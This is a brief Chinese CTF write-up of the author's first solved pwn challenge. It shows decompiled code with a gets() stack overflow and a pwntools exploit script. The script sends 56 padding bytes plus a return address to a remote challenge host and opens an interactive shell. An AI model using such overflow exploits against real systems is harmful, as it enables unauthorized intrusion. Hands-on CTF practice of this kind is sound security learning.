第一解出的pwn题

虽然题目不难，但是 是我第一次做出的pwn题，得写下。

__int64 sub_4007E6()
{
  char s1; // [sp+0h] [bp-30h]@1

  memset(&s1, 0, 0x30uLL);
  puts("Input your Name:");
  gets(&s1);
  if ( strcmp(&s1, "root") )
    ::s1 = strdup(&s1);
  return 0LL;
}

这里有溢出点。s1。

然后就很明确了。就差溢出的地址和覆盖多少了。

然后看了好久，看不出来。果断就调试，然后就直接出来了。

剩下就直接上代码了，过程有点想哭。。。还好有师傅给指点了下。

将p.sendline("whoami")
改成了p.interactive()

from pwn import *
re_add=0x0000000000400896
for i in range(10000):
    #p=process("./whoami")
    p=remote("101.71.29.5",10013)
    payload='A'*56+p64(re_add)
    p.recvuntil(">")
    p.sendline("1")
    p.recvuntil("Input your Name:\n")
    p.sendline(payload)
    p.interactive()
    p.close()

起初想爆破的。但没成功。。。所以就。。。

代码有点难看。。下次练下 写好点